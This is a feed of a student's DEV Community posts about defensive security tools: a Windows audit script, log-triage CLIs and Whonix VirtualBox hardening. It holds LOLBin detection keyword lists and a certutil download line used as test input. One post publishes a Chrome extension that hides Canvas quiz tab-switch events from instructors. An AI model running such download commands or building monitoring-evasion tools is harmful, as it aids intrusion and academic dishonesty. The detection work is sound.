DEV Community: TiltedLunar123

My Windows audit tool flagged rundll32 as suspicious. It was right, and useless.

TiltedLunar123 — Mon, 01 Jun 2026 09:14:38 +0000

I built a thing called WinRecon. it's a python script that audits a windows box and hands you back a security score. 20 checks, runs on the standard library only, no pip, no internet. you point it at a machine and it tells you the firewall is off on the public profile, smbv1 is still enabled, rdp has network level auth turned off, defender is disabled, that kind of stuff. it writes one self-contained html report and a json file you can feed into a SIEM.

the check i spent the most time on reads scheduled tasks and startup entries and tries to spot an attacker living off the land. encoded powershell, certutil pulling down a file, regsvr32 running a remote scriptlet, bitsadmin, msiexec, the usual lolbin crowd. the idea was simple. attackers reuse the same handful of signed binaries, so just scan the command lines for those keywords.

first time i ran it on my own laptop it threw four criticals. every one of them was rundll32 or certutil. none of them were malware.

the keyword scanner was technically correct

here's roughly what the first version did. i had a flat list of bad strings and i checked if any of them showed up in the task's command line.

SUSPICIOUS = [
    "-enc", "-encodedcommand", "frombase64string", "bypass",
    "certutil", "bitsadmin", "regsvr32", "rundll32", "msiexec",
    "invoke-expression", "downloadstring", "ngrok.io",
    "raw.githubusercontent", "pastebin.com",
]

def scan_command(cmd):
    hits = [s for s in SUSPICIOUS if s in cmd.lower()]
    if hits:
        return Finding("CRITICAL", f"suspicious task: {hits}")
    return None

the problem is that windows ships with a pile of scheduled tasks that legitimately call rundll32. there's one that runs rundll32.exe advpack.dll,DelNodeRunDLL32. there's printer stuff, there's a microsoft compatibility appraiser task. certutil shows up in cert maintenance. so the scanner was right that the binary was there. it just had no idea whether the binary was doing something bad.

that's the actual hard part of lolbin detection and i'd basically skipped it. presence of certutil isn't the signal. certutil reaching out to a url is the signal. rundll32 loading a dll out of %temp% is the signal. rundll32 firing off a signed microsoft task is just tuesday.

what i changed

i stopped treating the keyword list as one bucket. i split it by how much the match actually tells you.

a bare lolbin name on its own is weak. it only gets interesting when it's paired with something else. so a hit became critical only if the binary keyword showed up with a second-stage indicator, like a url, a base64 blob, -windowstyle hidden, or a path that points at a temp or appdata directory. a lolbin by itself with none of that drops down to INFO, which in the report means "here, look at this, but i'm not going to scare you about it."

STAGE2 = ["http://", "https://", "-enc", "frombase64string",
          "-windowstyle hidden", "%temp%", "%appdata%", "downloadstring"]

def scan_command(cmd):
    c = cmd.lower()
    lol = [s for s in LOLBINS if s in c]
    if not lol:
        return None
    stage2 = [s for s in STAGE2 if s in c]
    if stage2:
        return Finding("CRITICAL", f"{lol} with {stage2}")
    return Finding("INFO", f"{lol} present, no second-stage indicators")

after that, my laptop went from four criticals to zero, with a handful of INFO notes for the microsoft tasks i now know are fine. and the one time i tested it against a fake task that ran powershell -enc <base64> out of appdata, it lit up critical like it should.
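
a self-contained version of the tiered check, as a minimal sketch rather than WinRecon's actual code. the Finding class is a hypothetical stand-in, and putting "powershell" in LOLBINS is an assumption (the powershell -enc test case above only fires if it's in that list).

```python
from dataclasses import dataclass
from typing import Optional

# Binary names from the original keyword list. "powershell" is an assumption:
# the post's fake-task test (powershell -enc ...) needs it to be present.
LOLBINS = ["powershell", "certutil", "bitsadmin", "regsvr32", "rundll32", "msiexec"]

STAGE2 = ["http://", "https://", "-enc", "frombase64string",
          "-windowstyle hidden", "%temp%", "%appdata%", "downloadstring"]


@dataclass
class Finding:
    """Hypothetical stand-in for the tool's own finding type."""
    severity: str
    message: str


def scan_command(cmd: str) -> Optional[Finding]:
    c = cmd.lower()
    lol = [s for s in LOLBINS if s in c]
    if not lol:
        return None  # no lolbin at all, nothing to report
    stage2 = [s for s in STAGE2 if s in c]
    if stage2:
        # lolbin plus a second-stage indicator: worth a critical
        return Finding("CRITICAL", f"{lol} with {stage2}")
    return Finding("INFO", f"{lol} present, no second-stage indicators")


benign = scan_command("rundll32.exe advpack.dll,DelNodeRunDLL32")
remote = scan_command("certutil -urlcache -f http://example.invalid/a.bin a.bin")
print(benign.severity, remote.severity)
```

one limit worth knowing: "%temp%" and "%appdata%" are literal substring matches, so a command line that already has the expanded path in it would not trip them in this sketch.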

it's still keyword matching. i want to be honest about that. it doesn't parse the command line into a real argument tree, it doesn't follow what the dll actually does, and a half-clever attacker who renames their payload path or splits the command can walk right past it. it's a tripwire, not a verdict. for a tier 1 "is anything obviously wrong on this box" pass that's about the right altitude, but i wouldn't call it detection.

the part i'm actually happy with

the constraint that shaped the whole project was no dependencies. it had to run on a locked-down windows machine with no pip and no outbound internet, because that's the machine you actually want to audit. so everything is subprocess against built-in windows commands and stdlib parsing. netsh advfirewall for the firewall, net user and net localgroup for accounts, the registry for the powershell logging and uac settings.

that sounds annoying and it sort of was, but it means you can drop a single .py file on a fresh box and run it. no install step, nothing to flag, nothing to phone home. the report is one html file with the css inlined so it opens with no network either.

scoring is deliberately dumb. you start at 100, every critical costs 20, every warning costs 10, and you land on an A through F grade. i went back and forth on weighting findings more cleverly and decided against it. a crude score that a hiring manager or a non-security person can read in two seconds beats a precise one nobody trusts. exit code is 2 if anything critical fired, so you can wire it into a pipeline.
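
the scoring rule is small enough to sketch in full. the point costs and the exit code 2 come from the description above. the grade cutoffs, the floor at zero, and the exit code 0 for a clean run are assumptions, since the post doesn't spell them out.

```python
def score(severities):
    """Start at 100, subtract 20 per critical and 10 per warning."""
    total = 100
    for sev in severities:
        if sev == "CRITICAL":
            total -= 20
        elif sev == "WARNING":
            total -= 10
    return max(total, 0)  # assumption: the score never goes negative


# Assumption: school-style cutoffs. The real tool may draw the lines elsewhere.
GRADE_CUTOFFS = [(90, "A"), (80, "B"), (70, "C"), (60, "D")]


def grade(points):
    for cutoff, letter in GRADE_CUTOFFS:
        if points >= cutoff:
            return letter
    return "F"


def exit_code(severities):
    # 2 when anything critical fired; 0 otherwise is an assumption
    return 2 if "CRITICAL" in severities else 0


findings = ["CRITICAL", "WARNING", "INFO"]
print(score(findings), grade(score(findings)), exit_code(findings))
```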

what's next / what's broken

the lolbin scanner still can't tell a renamed binary or a split command from a clean one. real argument parsing is the obvious next step.
no native event log correlation yet. it checks that the event log service is healthy but doesn't read the logs.
the roadmap has compliance mapping (CIS, NIST), but i didn't want to claim a mapping i hadn't actually verified against the benchmark text, so it's not in there yet.

repo's here if you want to poke at it or tell me where the detection logic is naive: https://github.com/TiltedLunar123/WinRecon

it's MIT, and it's for boxes you're allowed to audit. it works. not perfect, but it works.

I let the AI write the report, not decide the alerts

TiltedLunar123 — Sun, 31 May 2026 10:45:18 +0000

I've been building a SOC triage tool called TriageLens, and the whole thing started from one annoyance. Every "AI security analyst" demo I tried was just a chatbot with a log pasted into the prompt. Ask it twice, get two different verdicts. For triage that's useless. If the tool says "brute force, critical" one run and "looks fine" the next, I can't trust either answer.

So I drew a hard line early. The AI doesn't get to decide what's a finding. It only gets to write the finding up.

the split

Parsing, detection, and risk scoring are plain TypeScript. No model involved. The pipeline normalizes Windows Security 4688, Sysmon Event 1, Linux SSH auth.log, and generic JSON into one event shape, runs a list of detection rules over those events, and scores the result 0-100. All deterministic. Same logs in, same findings out, every time.

The AI layer sits at the very end. It takes the structured findings that already exist and turns them into analyst-style prose: a summary, per-finding notes, prioritized next steps. If I swap the provider from the built-in demo one to Ollama to Claude, the findings and the MITRE mapping don't move at all. Only the wording changes.

That property is the part I actually care about. The detections are auditable. The model is just the writer.

a rule is just a function

Each detection rule is a pure function that looks at the events and returns evidence strings. Empty array means it didn't fire. Here's the one I'm happiest with, the chained one:

{
  id: 'successful-auth-after-brute-force',
  title: 'Successful login after brute-force activity',
  severity: 'critical',
  techniques: techniques('T1110', 'T1078'),
  detect: (events) => {
    const failsByIp = countFailuresByIp(events)
    const evidence: string[] = []
    for (const e of events) {
      if (
        e.eventId === 'auth-success' &&
        e.sourceIp &&
        (failsByIp[e.sourceIp] ?? 0) >= 5
      ) {
        evidence.push(
          `Successful login for "${e.user}" from ${e.sourceIp} after ${failsByIp[e.sourceIp]} failures`,
        )
      }
    }
    return evidence
  },
}

On its own, a pile of failed SSH logons is just noise. Lots of hosts get sprayed all day. What changes the picture is a success from the same IP that just failed a bunch. The brute-force rule alone is rated high severity. The success-after-brute-force rule is critical, mapped to T1110 and T1078, because at that point you're probably looking at a real compromise, not background scanning.

Writing it as a plain function means I can unit test it with a handful of fake events and know it fires on exactly the case I want. No prompt tuning, no "please respond in JSON." countFailuresByIp is about six lines and counts auth-failure events per source IP. The whole rule file reads top to bottom like a checklist.
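
To show how little is needed to test a rule like this, here is the same logic as a Python sketch. It is a port for illustration only (the project itself is TypeScript), and the dict keys simply mirror the field names in the rule above.

```python
from collections import Counter


def count_failures_by_ip(events):
    """Count auth-failure events per source IP."""
    return Counter(
        e["sourceIp"]
        for e in events
        if e.get("eventId") == "auth-failure" and e.get("sourceIp")
    )


def success_after_brute_force(events, threshold=5):
    """Return one evidence string per success from an IP with enough failures."""
    fails = count_failures_by_ip(events)
    evidence = []
    for e in events:
        ip = e.get("sourceIp")
        if e.get("eventId") == "auth-success" and ip and fails[ip] >= threshold:
            evidence.append(
                f'Successful login for "{e.get("user")}" from {ip} '
                f"after {fails[ip]} failures"
            )
    return evidence


fake = [{"eventId": "auth-failure", "sourceIp": "10.0.0.5", "user": "root"}] * 5
fake.append({"eventId": "auth-success", "sourceIp": "10.0.0.5", "user": "root"})
print(success_after_brute_force(fake))
```

Like the rule above, this counts failures across the whole batch, so a success that happened before the failures would also fire. Ordering by timestamp would be a natural tightening.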

what I tried first and dropped

My first version actually did hand the raw logs to the model and ask it to return findings as JSON. It worked in the demo and fell apart the moment I fed it anything weird. Sometimes it invented an event ID that wasn't in the log. Once it confidently flagged a normal svchost as a LOLBin. And the JSON would occasionally come back with a trailing comment or markdown fence that broke the parser.

I spent a day trying to prompt my way out of that and then gave up on the approach entirely. Moving detection into code wasn't a performance decision, it was a "I need to be able to trust this" decision. The model is great at writing the summary. It's bad at being the source of truth.

what's still rough

The honest part. It only reads EVTX if you've already exported it to JSON. There's no native .evtx binary parser yet, which is the next thing on the roadmap, and right now that export step is an annoying manual hop. The rule set is small, seven rules, so it catches the obvious stuff (encoded PowerShell, Office spawning a child process, log clearing, the SSH chain) and misses plenty. I want Sigma import so I'm not the only one writing detections in my own format.

It also isn't a SIEM and I'm not pretending it is. It's a learning project and a triage aid. It does not replace tuned detection content or a human deciding what matters.

It runs with zero setup though. npm install, npm run dev, a sample log is already loaded, click Analyze. The default provider needs no API key, so you can see the whole loop without signing up for anything.

Repo's here if you want to poke at it or tell me which rule is wrong: https://github.com/TiltedLunar123/triagelens

Built with React, TypeScript, Vite, and vitest for the rule tests. Happy to take detection ideas, that's the part I most want to grow.

The VirtualBox settings I had to turn off before shipping a Whonix installer

TiltedLunar123 — Fri, 29 May 2026 09:32:24 +0000

Whonix is a pair of linux VMs that route all your traffic through Tor. One VM (gateway) does tor. The other (workstation) has no direct internet at all, only a private adapter that connects to the gateway. If something in the workstation gets compromised, it still can't see your real IP, because it doesn't have a path to it.

That gateway/workstation isolation is the whole pitch and it works. The part people don't talk about as much is that the workstation VM itself has a bunch of communication channels back to the host machine, and those channels are not protected by the tor isolation at all. They're configured in VirtualBox, and VirtualBox defaults assume you want a usable desktop, not an isolated one.

I built a powershell installer for Whonix on windows. The first version downloaded the OVA, imported it, started the gateway, started the workstation. Done. I opened the workstation settings in the VirtualBox GUI to take a screenshot for the README, and saw this:

Audio: enabled, PulseAudio driver
Shared clipboard: bidirectional
Drag and drop: bidirectional
USB controller: enabled (USB 2.0 OHCI/EHCI)
3D acceleration: enabled
Remote display: enabled on port 3389

For a privacy VM, every one of those is a problem.

Clipboard and drag-and-drop

Bidirectional clipboard means anything copied on the host shows up in the workstation, and anything copied in the workstation shows up on the host. If you're using Whonix to do something you don't want associated with your real identity, and you have a password manager on the host that auto-pulls clipboard, you've crossed the boundary in two directions.

Drag-and-drop is the same thing for files. Either disable both or set them to one direction. I default to off:

VBoxManage modifyvm "Whonix-Workstation-Xfce" --clipboard-mode disabled
VBoxManage modifyvm "Whonix-Workstation-Xfce" --draganddrop disabled

Audio

PulseAudio in a privacy VM is just noise (literal and figurative). The audio device gets a name from the host config, which can be a fingerprintable string. Even ignoring fingerprinting, you almost never want sound out of a tor-routed VM.

VBoxManage modifyvm "Whonix-Workstation-Xfce" --audio-driver none

USB controller

USB passthrough lets the guest see USB devices on the host. Plug in a YubiKey, the guest can read serial number, vendor ID, product ID. Same with USB drives, webcams, phones. None of that should be reachable from a workstation that's supposed to be isolated.

VBoxManage modifyvm "Whonix-Workstation-Xfce" --usb-ohci off --usb-ehci off --usb-xhci off

3D acceleration

3D accel routes guest graphics calls through the host GPU driver. The history of VM escapes through 3D drivers is long enough that it's the first thing to turn off on any VM you actually care about. For a workstation running tor browser and a text editor, you don't need it.

VBoxManage modifyvm "Whonix-Workstation-Xfce" --accelerate3d off

Remote display

Default-on RDP inside a VM that's supposed to be isolated. Bound to localhost by default, but it's still a service running that the workstation has no reason to expose.

VBoxManage modifyvm "Whonix-Workstation-Xfce" --vrde off

What I had to learn the hard way

Two things tripped me up writing this.

First, you can't apply most of these settings while the VM is running. VBoxManage gives you a polite error and exits. The installer order matters: import the OVA, configure with VM stopped, then start. I had import-then-start before I added the configure step, and the script ran without errors but quietly never applied any hardening.
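
One way to make that ordering hard to get wrong is to check the VM state before configuring and to fail loudly if any step errors. This is a Python sketch of the idea, not the installer's PowerShell. It relies on VBoxManage showvminfo --machinereadable printing a VMState="..." line, and treating only "poweroff" as safe is a deliberately strict assumption.

```python
import subprocess


def parse_vm_state(machine_readable):
    """Pull the VMState value out of `showvminfo --machinereadable` output."""
    for line in machine_readable.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "VMState":
            return value.strip().strip('"')
    return "unknown"


def harden_if_stopped(vm, settings):
    """Apply each modifyvm argument list, but only when the VM is powered off.

    `settings` is a list of argument lists, e.g. [["--vrde", "off"]].
    """
    info = subprocess.run(
        ["VBoxManage", "showvminfo", vm, "--machinereadable"],
        capture_output=True, text=True, check=True,
    ).stdout
    state = parse_vm_state(info)
    if state != "poweroff":
        raise RuntimeError(f"{vm} is {state!r}; stop it before hardening")
    for args in settings:
        # check=True turns a failed modifyvm into an exception instead of a
        # silently skipped setting
        subprocess.run(["VBoxManage", "modifyvm", vm, *args], check=True)


print(parse_vm_state('name="Whonix-Workstation-Xfce"\nVMState="running"\n'))
```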

Second, VirtualBox has both --clipboard-mode (newer) and --clipboard (older). Depending on which version is installed, one of them throws an unknown option error. I pin VirtualBox to a known version in the installer to dodge this, but it bit me on a friend's machine that had an old 6.x version lying around from a previous install.
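
If pinning is not an option, the flag can be chosen from the installed version instead. A small Python sketch, assuming the output of VBoxManage --version starts with major.minor (for example 7.0.14r161095) and assuming the rename landed in 6.1. That cutoff is my recollection, so check it against the manual for the versions you support.

```python
import re


def clipboard_flag(version_output):
    """Pick the clipboard option name for a given `VBoxManage --version` string."""
    m = re.match(r"(\d+)\.(\d+)", version_output.strip())
    if not m:
        raise ValueError(f"unrecognized version string: {version_output!r}")
    major, minor = int(m.group(1)), int(m.group(2))
    # Assumption: --clipboard-mode exists from 6.1 on, --clipboard before that
    return "--clipboard-mode" if (major, minor) >= (6, 1) else "--clipboard"


print(clipboard_flag("7.0.14r161095"), clipboard_flag("6.0.24r139119"))
```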

The installer also does SHA-512 verification of the OVA, and there's an optional flag to pin the VirtualBox installer hash. Different post. If you verify the OS image but not the hypervisor binary, your supply chain story has a hole in it.
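
The hash check itself is short. This is a generic Python sketch of SHA-512 verification, not the installer's code. It reads in chunks so a multi-gigabyte OVA never has to fit in memory, and the temp file is just a stand-in for the real download.

```python
import hashlib
import hmac
import os
import tempfile


def sha512_of(path, chunk_size=1 << 20):
    """Hash a file in 1 MiB chunks and return the lowercase hex digest."""
    digest = hashlib.sha512()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_sha512(path, expected_hex):
    """True only if the file's digest equals the published one."""
    return hmac.compare_digest(sha512_of(path), expected_hex.strip().lower())


# Demo on a throwaway file standing in for the OVA.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"not a real ova")
    demo_path = tmp.name
try:
    expected = hashlib.sha512(b"not a real ova").hexdigest()
    ok = verify_sha512(demo_path, expected)
    tampered = verify_sha512(demo_path, "0" * 128)
finally:
    os.remove(demo_path)
print(ok, tampered)
```

The expected digest has to come from somewhere other than the download itself, otherwise the check only proves the file matches itself.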

What still bugs me

The big one: clipboard fully off is annoying. If someone uses Whonix as a daily-driver browsing VM, they want to copy URLs in and out. The right call is probably host-to-guest only (you can paste in, the workstation can't push back to the host). I haven't shipped that change because picking a default direction the user can't easily fight is its own design problem, and I haven't decided which direction wins.

Repo: https://github.com/TiltedLunar123/WhonixAutoSetup

How Canvas LMS tracks tab-switches during quizzes, and a chrome extension to stop it

TiltedLunar123 — Thu, 28 May 2026 09:54:39 +0000

a friend told me her professor pulled her aside after a quiz because the LMS flagged her for "tab switching 7 times". she wasn't cheating. she alt-tabbed to check the time on her clock app, then back. seven times over a 50-minute quiz.

i went looking for what canvas actually sends back when you blur the window. turns out it's pretty noisy.

what canvas tracks

open devtools on a quiz page, switch tabs, switch back. you'll see POSTs to something like /api/v1/courses/X/quizzes/Y/submissions/Z/events with payloads like:

{
  "event_type": "page_blurred",
  "event_data": { "timestamp": 1716902400000 }
}

then page_focused when you come back. it also pings on visibilitychange for good measure, and there's a separate page-view heartbeat that ticks every few seconds.

the events get attached to your submission. teachers see them in speedgrader as a little timeline. some schools have explicit policies that more than N tab-switches is grounds for "additional scrutiny".

first attempt: just block the endpoint

my first idea was a one-line declarativeNetRequest rule blocking */quiz_submission_events*. easy. doesn't work.

why? canvas uses navigator.sendBeacon() for some of these. beacons queue at the browser level and behave a little differently than fetch when it comes to extension interception. some events were still leaking through. there are also a couple of analytics endpoints that the same event posts to as redundancy, so blocking the obvious URL misses a few.

the actual approach

two layers.

layer 1: declarativeNetRequest. static rules in rules.json that block five known endpoints. cheap, fast. browser handles it before any js runs.

layer 2: a main-world inject script. patches addEventListener so anything registering for blur/focus/visibilitychange on quiz pages just gets a no-op. patches sendBeacon to return true without sending. patches fetch and XMLHttpRequest to filter the same URL patterns. also overrides document.visibilityState and document.hidden so even if a listener slips through, it always reads "visible".

manifest v3 makes you jump through hoops here. content scripts run in an isolated world by default and can't patch page globals. you need world: "MAIN" in the content_scripts entry, which is a relatively recent MV3 addition. without it none of the prototype patching works.

// snippet from inject.js
const origAdd = EventTarget.prototype.addEventListener;
EventTarget.prototype.addEventListener = function(type, listener, opts) {
  if (BLOCKED_EVENTS.has(type) && isQuizPage()) {
    return;
  }
  return origAdd.call(this, type, listener, opts);
};

dumb but it works. canvas's quiz js binds blur/focus exactly once on load, so if you patch addEventListener before their script runs, those listeners never get registered.

tier system

i ended up with three settings because heavy mode broke a few classes that legitimately use page-view tracking for participation grades.

lite: blocks the quiz_events endpoint and drops blur/focus listeners. minimal footprint.
mod: adds beacon/heartbeat blocking and stubs sendBeacon.
heavy (default): everything above plus visibility spoofing and full fetch/XHR interception.

per-domain allowlist. doesn't activate unless you've explicitly added the school's canvas instance.

what it can't do

proctoring software (respondus lockdown, proctorio, honorlock) is outside the browser sandbox. they hook the OS-level focus events through native code. nothing a chrome extension can touch.

server-side page views are also unblockable. canvas logs an HTTP request every time it serves a page. if you load the quiz, that's logged. you can stop the blur tracking but not "they opened the quiz at 3:47pm".

what i'm not happy with yet

the inject script timing is fragile. on slow networks the canvas quiz js sometimes runs before my patches apply, and then a blur event leaks through. i've seen it twice in 50-ish tests. moving the prototype patching to a run_at: document_start content script in a separate file would close that gap. on the todo list.

DNR's five-rule cap on static rulesets is also annoying. dynamic rules would let me add more endpoints based on what i see in network logs, but then i need storage permission and the security review for store distribution gets harder. for now i'm shipping unpacked from github.

privacy note

doesn't send anything anywhere. no analytics, no crash reports, no remote config. the only network requests it makes are the ones it's blocking.

repo: https://github.com/TiltedLunar123/canvas-blinders

if you want to see what canvas actually tracks before installing anything, open devtools on a quiz, switch tabs a few times, and watch the network panel. it's all there in cleartext.

My log triage tool is slower than Chainsaw, and I shipped it anyway

TiltedLunar123 — Wed, 27 May 2026 09:13:04 +0000

i build security tools as a cybersec student, mostly so i actually understand the stuff i'm studying instead of just memorizing it for Security+. ThreatLens started because i got tired of scrolling raw windows event logs looking for the one line that mattered.

the idea is simple. point it at a folder of logs, it runs detections, it tells you what looks like an attack. offline, no server, no agent. just a CLI.

the problem

if you've ever opened a security.json export with 900k events in it you know the feeling. somewhere in there is a brute force, or a service getting installed it shouldn't, or someone dumping creds. but you're not finding it by eye. you need something to do the first pass so you can spend your time investigating instead of reading.

i wanted that first pass to be local. a lot of the triage stuff assumes you've already shipped everything to a SIEM. i don't always have one running on my own boxes, and i wanted something i could just pip install and run.

what i tried

first version just regex'd through lines and counted failed logins. that catches the dumbest brute force and nothing else. real attacks are multi step. someone gets in with valid creds (T1078), runs something (T1059), sets up persistence (T1543), then moves sideways. a single rule never sees the whole picture.

so the detections became modules, 12 of them, each mapped to a MITRE technique. that part was fine. the part that took longer was correlation. a failed-login spike on its own is noise. a failed-login spike followed by a success followed by a new service on the same host is a story. linking those across detection boundaries is where most of the actual work went.

one design choice i'm happy with: separating targeted brute force from credential spray. they look similar if you just count failures. but a brute force hammers one account in a burst, and a spray tries one password across many accounts slowly. burst analysis on the timing tells them apart, and they're different investigations, so calling them the same thing would be lying to the analyst.
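
a rough sketch of that split, not ThreatLens's actual module. it looks at failed logins per source and uses two signals: how many distinct accounts were tried and the median gap between attempts. the field names and all three thresholds are made up for illustration.

```python
import statistics
from collections import defaultdict


def classify_failures(failures, min_failures=10, many_accounts=5, burst_gap=2.0):
    """Label each noisy source as brute_force, credential_spray, or unclassified.

    `failures` is a list of dicts with 'source', 'user', and 'ts' (seconds).
    """
    by_source = defaultdict(list)
    for f in failures:
        by_source[f["source"]].append(f)

    verdicts = {}
    for source, evs in by_source.items():
        if len(evs) < max(min_failures, 2):
            continue  # too few attempts to say anything
        times = sorted(e["ts"] for e in evs)
        median_gap = statistics.median(b - a for a, b in zip(times, times[1:]))
        accounts = {e["user"] for e in evs}
        if len(accounts) >= many_accounts and median_gap > burst_gap:
            verdicts[source] = "credential_spray"   # many accounts, slow pace
        elif len(accounts) < many_accounts and median_gap <= burst_gap:
            verdicts[source] = "brute_force"        # few accounts, tight burst
        else:
            verdicts[source] = "unclassified_failures"
    return verdicts


burst = [{"source": "10.0.0.9", "user": "admin", "ts": t} for t in range(12)]
spray = [{"source": "10.0.0.7", "user": f"u{i}", "ts": i * 60} for i in range(12)]
print(classify_failures(burst + spray))
```

the third label matters: a source that is fast and wide, or slow and narrow, is left for the analyst instead of being forced into one of the two stories.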

what worked

YAML rules with a handful of operators (equals, contains, regex, threshold) cover most of what i wanted to write without touching python. and it reads Sigma rules directly, which mattered because i didn't want to reinvent a rule format the whole industry already uses. selections, filters, field modifiers, conditions. not the full sigma-rs engine, but enough.

output goes to terminal, json, csv, or an html report with severity charts and an attack timeline. it can also push to elastic, splunk HEC, wazuh, or spit out an ATT&CK Navigator layer so you can see coverage on the matrix.

the numbers

synthetic benchmark, single core, python 3.11 on windows 11:

9,009 events (2.3 MB): 0.13s, about 69k events/sec
90,145 events (22.6 MB): 1.27s, about 71k events/sec
901,341 events (226 MB): 14.24s, about 63k events/sec

on the sample dataset it hit every embedded technique and threw zero false positives on the benign activity. small sample, so i'm not going to pretend that's a real detection-rate claim, but it's a start.

what's broken / what i'd change

here's the honest part. at 63k events/sec it's slower than Chainsaw and Hayabusa, which are compiled. for a single-core python tool reading EVTX i think that's fine, but if you've got hundreds of millions of events you'd want one of those instead. i'm not pretending to compete on raw speed.

the parser also wants event IDs and syslog fields mapped to formats it knows. throw it something weird and it'll shrug. that's the next thing i want to fix, a more forgiving field mapper so onboarding a new log source doesn't mean editing code.

and the false-positive testing needs real ugly data, not synthetic. synthetic logs are too clean. real environments are full of weird-but-benign stuff that trips naive rules, and i won't trust the detection numbers until i've run it against messier input.

it's defensive only. no remote access, no capture, no exploit anything. just reads logs you already have on systems you're allowed to look at.

it works. not perfect, but it works, and i learned more about how attacks actually chain together building this than i did from any single chapter of studying.

repo: https://github.com/TiltedLunar123/ThreatLens

if you do detection engineering for real, i'd genuinely like to know what log source you'd want supported first.

shipping an offline log triage cli, and the parser bugs that still haunt me

TiltedLunar123 — Tue, 19 May 2026 11:10:45 +0000

a few weeks back i had a 226MB JSON log dump from a lab exercise and absolutely no desire to stand up a full SIEM just to find brute force attempts and lateral movement traces. i tried grep, gave up, tried jq, gave up harder, then ended up writing a python script that snowballed into ThreatLens.

it's a CLI that does offline triage on security logs. 12 detection modules, sigma rule compat, MITRE ATT&CK mapping, no daemon, no docker, no infra. you point it at a folder, it gives you a report.

threatlens scan logs/ --sigma-rules sigma/rules/ --min-severity high -o report.html

that's it. one command, html report on the other side.

what i actually had to solve

the first thing that bit me was EVTX parsing. windows event log binary format is annoyingly underdocumented in places, and the python-evtx library is solid but slow if you use it naively. i was getting around 8k events/sec on a 22MB file, which was unusable.

i ended up streaming records instead of loading them, plus deferring the XML-to-dict conversion until a record actually matched a candidate detector. that pulled the throughput up. on synthetic benchmarks (single-core python 3.11):

9k events / 2.3 MB: 0.13s, 69.3k events/sec
90k events / 22.6 MB: 1.27s, 71.0k events/sec
900k events / 226 MB: 14.24s, 63.3k events/sec

it scales pretty flat, which i didn't expect. i thought GC churn or memory pressure would tank the big runs. it didn't.
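
the stream-then-defer idea from above, sketched on NDJSON because it fits in a few lines. the real tool defers XML-to-dict conversion on EVTX records, so treat this as an analogy: a cheap substring test decides whether a line is worth the expensive parse. the function name and the needle values are illustrative.

```python
import io
import json


def stream_candidates(lines, needles):
    """Yield parsed records only for lines containing at least one needle.

    `lines` can be any iterable of strings, such as an open file, so nothing
    is loaded up front. The substring test may let through lines no detector
    wants, but it never drops a line that contains a needle.
    """
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue  # tolerate blank or whitespace-only lines
        if not any(n in raw for n in needles):
            continue  # skipped without paying for json.loads
        yield json.loads(raw)


sample = io.StringIO(
    '{"EventID": 4624, "user": "a"}\n'
    "\n"
    '{"EventID": 4625, "user": "b"}\n'
    '{"EventID": 7045, "user": "c"}\n'
)
hits = list(stream_candidates(sample, needles=("4625", "7045")))
print([h["user"] for h in hits])
```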

the detector design

there are 12 built-in detection modules and they all implement the same interface. you can write custom ones in python or YAML.

YAML rule example:

name: suspicious_powershell_encoded
event_id: 4104
match:
  - field: script_block
    op: regex
    value: '(?i)([A-Za-z0-9+/]{50,}={0,2})'
  - field: user
    op: not_equals
    value: SYSTEM
severity: high
mitre: T1059.001

twelve operators total: equals, contains, regex, thresholds, time windows, and a few others. sigma rules also work. i implemented selection/filter/condition parsing and most field modifiers. not all of them. the sigma cidr modifier is half-broken in my impl and i know it. it's on the issue list.
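
to make the rule format concrete, here is a minimal evaluator for the example above. it's a sketch, not the ThreatLens loader: the rule is written as the dict a YAML parser would produce, only four operators are covered, and it assumes all match entries must hold (AND) and that a missing field means no match.

```python
import re

# Four of the operators named above; the real set is larger.
OPS = {
    "equals": lambda actual, expected: actual == expected,
    "not_equals": lambda actual, expected: actual != expected,
    "contains": lambda actual, expected: str(expected) in str(actual),
    "regex": lambda actual, expected: re.search(expected, str(actual)) is not None,
}

RULE = {
    "name": "suspicious_powershell_encoded",
    "event_id": 4104,
    "match": [
        {"field": "script_block", "op": "regex",
         "value": r"(?i)([A-Za-z0-9+/]{50,}={0,2})"},
        {"field": "user", "op": "not_equals", "value": "SYSTEM"},
    ],
    "severity": "high",
    "mitre": "T1059.001",
}


def rule_matches(rule, event):
    """True when the event has the rule's event_id and every condition holds."""
    if event.get("event_id") != rule["event_id"]:
        return False
    for cond in rule["match"]:
        if cond["field"] not in event:
            return False  # assumption: a missing field never matches
        if not OPS[cond["op"]](event[cond["field"]], cond["value"]):
            return False
    return True


event = {"event_id": 4104, "user": "alice",
         "script_block": "powershell -enc " + "A" * 60}
print(rule_matches(RULE, event))
```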

multi-stage chain correlation

this is the part i'm actually proud of. instead of just firing alerts per-event, ThreatLens groups events that look like they're part of the same kill chain. brute force, then an interactive logon, then mimikatz-style SAM access. it links them across time windows.
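
a toy version of that grouping, to show the shape of the problem rather than the real correlation engine. it walks each host's alerts in time order and looks for the three stages in sequence, dropping a partial chain if the gap to the next stage is too long. the stage names, field names, and the 15-minute window are all assumptions.

```python
from collections import defaultdict

# Hypothetical stage labels for the chain described above.
CHAIN = ["brute_force", "interactive_logon", "credential_access"]


def find_chains(alerts, window=900):
    """Return complete chains, each a list of alerts in stage order.

    `alerts` is a list of dicts with 'host', 'ts' (seconds), and 'kind'.
    """
    by_host = defaultdict(list)
    for a in alerts:
        by_host[a["host"]].append(a)

    chains = []
    for items in by_host.values():
        items.sort(key=lambda a: a["ts"])
        stage, current = 0, []
        for a in items:
            if current and a["ts"] - current[-1]["ts"] > window:
                stage, current = 0, []  # previous stage went stale, start over
            if a["kind"] == CHAIN[stage]:
                current.append(a)
                stage += 1
                if stage == len(CHAIN):
                    chains.append(current)
                    stage, current = 0, []
    return chains


alerts = [
    {"host": "A", "ts": 0, "kind": "brute_force"},
    {"host": "A", "ts": 120, "kind": "interactive_logon"},
    {"host": "A", "ts": 300, "kind": "credential_access"},
    {"host": "B", "ts": 0, "kind": "brute_force"},
    {"host": "B", "ts": 5000, "kind": "interactive_logon"},
]
print(len(find_chains(alerts)))
```

this greedy pass only tracks one partial chain per host, which is the first thing a real implementation would have to outgrow.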

on a 26-event focused simulation it found 1 CRITICAL, 8 HIGH, 2 MEDIUM, 1 LOW. on a 52-event mixed dataset (benign noise plus embedded attack) it hit zero false positives and 100% detection on the embedded TTPs.

